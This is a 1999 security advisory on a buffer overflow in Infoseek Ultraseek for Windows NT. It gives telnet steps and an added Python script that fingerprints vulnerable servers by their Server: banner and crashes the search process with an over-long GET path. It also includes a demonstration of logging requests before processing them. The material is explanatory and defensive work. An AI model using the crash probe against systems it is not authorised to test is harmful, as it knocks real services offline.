Infoseek's Ultraseek for Windows NT is vulnerable to a remote buffer overflow
16 Dec. 1999
Summary
By default the Ultraseek search engine listens on TCP port 8765 and provides an HTTP interface that lets internet/intranet users search a server for documents matching their keywords. This HTTP interface contains a buffer overflow that allows remote attackers to crash the service and potentially compromise the remote system.
Credit:
The information has been provided by: USSR & eEye.
Vulnerable systems:
Infoseek Ultraseek 3.1 and prior for Windows NT
To identify a vulnerable server, connect to the search port and check the Server: header in the response:
C:\>telnet www.example.com 8765
HEAD / HTTP/1.0
<enter>
<enter>
HTTP/1.0 200 OK
Server: Ultraseek/3.1 Python/1.5.1
Date: Thu, XX Dec 1999 23:59:42 GMT
Content-type: text/html
Content-length: 0
A Server: header of Ultraseek/3.1 or lower identifies an affected installation.
The overflow is in the handling of the request path of an HTTP GET. To perform a Denial of Service (DoS) attack against the server, send a GET whose path component is over-long, where [overflow] below stands for that long string:
C:\>telnet www.example.com 8765
GET /[overflow]/ HTTP/1.0
<enter>
<enter>
At this point one of the two pyseekd.exe processes (the Ultraseek Server Process) will crash and be reinitialized. Because Ultraseek runs as a service, no error message is ever shown on screen; the only visible sign that the process died and reloaded is that one of the two pyseekd.exe processes now has a new PID.
Note: The proof-of-concept exploit this advisory is based on (not reproduced here) only creates a file called ussreeye.txt in whatever the current root is. It has only been tested against Ultraseek 2.1 for NT with Windows NT Service Pack 5 and Service Pack 6.
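The fingerprinting and DoS steps above, as an added example that is not part of the original advisory or of Infoseek's code. It sends the same HEAD request, parses the Server: header, flags Ultraseek 3.1 and lower as affected, and builds the over-long GET. The overflow length (8000 bytes) and the sample response embedded below are constructed for illustration; the advisory gives no specific length.

```python
"""Probe an Ultraseek listener the way the advisory describes.
Added example; ULTRASEEK_PORT comes from the advisory, OVERFLOW_LEN is an
assumed value, SAMPLE_RESPONSE is a constructed copy of the advisory's HEAD reply."""
import re
import socket
import sys

ULTRASEEK_PORT = 8765
LAST_AFFECTED_VERSION = (3, 1)   # advisory: "3.1 and prior"
OVERFLOW_LEN = 8000              # assumption, not a figure from the advisory

# Constructed sample, modelled on the response shown in the advisory.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Ultraseek/3.1 Python/1.5.1\r\n"
    b"Date: Thu, 16 Dec 1999 23:59:42 GMT\r\n"
    b"Content-type: text/html\r\n"
    b"Content-length: 0\r\n\r\n"
)


def build_head_request(host):
    """The HEAD request used to read the Server: banner."""
    return f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def parse_server_header(response):
    """Return (product, version tuple) from the Server: header, or None."""
    text = response.decode("latin-1", "replace")
    head = text.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            m = re.match(r"\s*([A-Za-z]+)/(\d+(?:\.\d+)*)", value)
            if m:
                version = tuple(int(x) for x in m.group(2).split("."))
                return m.group(1), version
    return None


def is_vulnerable(server):
    """Ultraseek with a major.minor of 3.1 or lower is affected."""
    if server is None:
        return False
    product, version = server
    return product.lower() == "ultraseek" and version[:2] <= LAST_AFFECTED_VERSION


def build_overflow_request(length=OVERFLOW_LEN):
    """GET /[overflow]/ HTTP/1.0 with an over-long path component."""
    return b"GET /" + b"A" * length + b"/ HTTP/1.0\r\n\r\n"


def fingerprint(host, port=ULTRASEEK_PORT, timeout=5.0):
    """Connect, send HEAD, read the whole reply and parse the Server: header."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_head_request(host))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_server_header(data)


def crash_probe(host, port=ULTRASEEK_PORT, timeout=5.0):
    """Send the oversized GET. The advisory notes the process restarts silently,
    so the only remote symptom is the connection closing without a response."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_overflow_request())
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Offline demonstration on the constructed sample, then an optional live probe.
    print("sample:", parse_server_header(SAMPLE_RESPONSE),
          "vulnerable:", is_vulnerable(parse_server_header(SAMPLE_RESPONSE)))
    if len(sys.argv) == 2:
        banner = fingerprint(sys.argv[1])
        print(sys.argv[1], banner, "vulnerable:", is_vulnerable(banner))
```

Only run crash_probe against a host you are authorised to test; it restarts the target's search process, as described above.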
What gets logged?
In the application event log you will see a Warning with the following information: "Ultraseek Server: Warning: restarted 3.1.4". In the Ultraseek http access logs (C:\Program Files\Infoseek\UltraseekServer\data\logs ) nothing is logged.
This is another example of a web service that fails to log a request before it processes it (the same happens with IIS). Any service that accepts commands should log the command first and only then process it; that way, unless the overflow is in the logging code itself, the log will always record which IP address performed the attack.
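The log-first ordering argued for above, as an added example that is not Ultraseek or IIS code. The "crash" is simulated with an exception raised by a toy GET parser with an assumed 256-byte path limit; in the real case the process dies and nothing after the parse step runs, which is exactly why the process-then-log ordering leaves the access log empty. The client addresses and requests are constructed for the demonstration.

```python
"""Log-before-process versus process-then-log, with a simulated crash.
Added example; fragile_get_handler, its 256-byte limit and SAMPLE_REQUESTS are
all constructed for illustration."""

MAX_LOGGED_LEN = 512   # cap the logged request line so it cannot overflow the logger too


class ProcessCrash(Exception):
    """Stand-in for the server process dying on an over-long GET path."""


def fragile_get_handler(raw_request):
    """Toy request parser that 'overflows' on a long path component."""
    request_line = raw_request.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) != 3 or parts[0] != b"GET":
        return b"HTTP/1.0 400 Bad Request\r\n\r\n"
    if len(parts[1]) > 256:              # assumed fixed-size path buffer
        raise ProcessCrash("request path too long")
    return b"HTTP/1.0 200 OK\r\n\r\n"


def request_line_for_log(raw_request):
    """First line of the request, truncated, as printable text."""
    line = raw_request.split(b"\r\n", 1)[0][:MAX_LOGGED_LEN]
    return line.decode("latin-1", "replace")


def status_of(response):
    return response[9:12].decode()       # "HTTP/1.0 200 OK" -> "200"


def process_then_log(log, client_ip, raw_request, handler=fragile_get_handler):
    """The ordering criticised above: the entry is written only if processing returns."""
    response = handler(raw_request)
    log.append(f'{client_ip} "{request_line_for_log(raw_request)}" {status_of(response)}')
    return response


def log_then_process(log, client_ip, raw_request, handler=fragile_get_handler):
    """Write who sent what first; a crash in the handler cannot erase that entry."""
    log.append(f'{client_ip} "{request_line_for_log(raw_request)}" received')
    response = handler(raw_request)
    log.append(f'{client_ip} "{request_line_for_log(raw_request)}" {status_of(response)}')
    return response


def serve(strategy, requests):
    """Run (client_ip, raw_request) pairs through one strategy and return the log.
    A simulated crash is swallowed, mirroring the service restarting itself."""
    log = []
    for client_ip, raw in requests:
        try:
            strategy(log, client_ip, raw)
        except ProcessCrash:
            pass                          # service restarts; what does the log hold?
    return log


# Constructed sample traffic: one normal search, then the oversized GET.
SAMPLE_REQUESTS = [
    ("192.0.2.10", b"GET /search?q=test HTTP/1.0\r\n\r\n"),
    ("192.0.2.77", b"GET /" + b"A" * 4000 + b"/ HTTP/1.0\r\n\r\n"),
]


def logged_ips(strategy):
    """Client addresses that made it into the log under the given ordering."""
    return [line.split(" ", 1)[0] for line in serve(strategy, SAMPLE_REQUESTS)]


if __name__ == "__main__":
    print("process then log:", logged_ips(process_then_log))
    print("log then process:", logged_ips(log_then_process))
```

With process-then-log only the legitimate client appears in the log; with log-then-process the attacker's address is recorded before the parser ever sees the over-long path, and the truncation in request_line_for_log keeps the logger itself from becoming the next overflow.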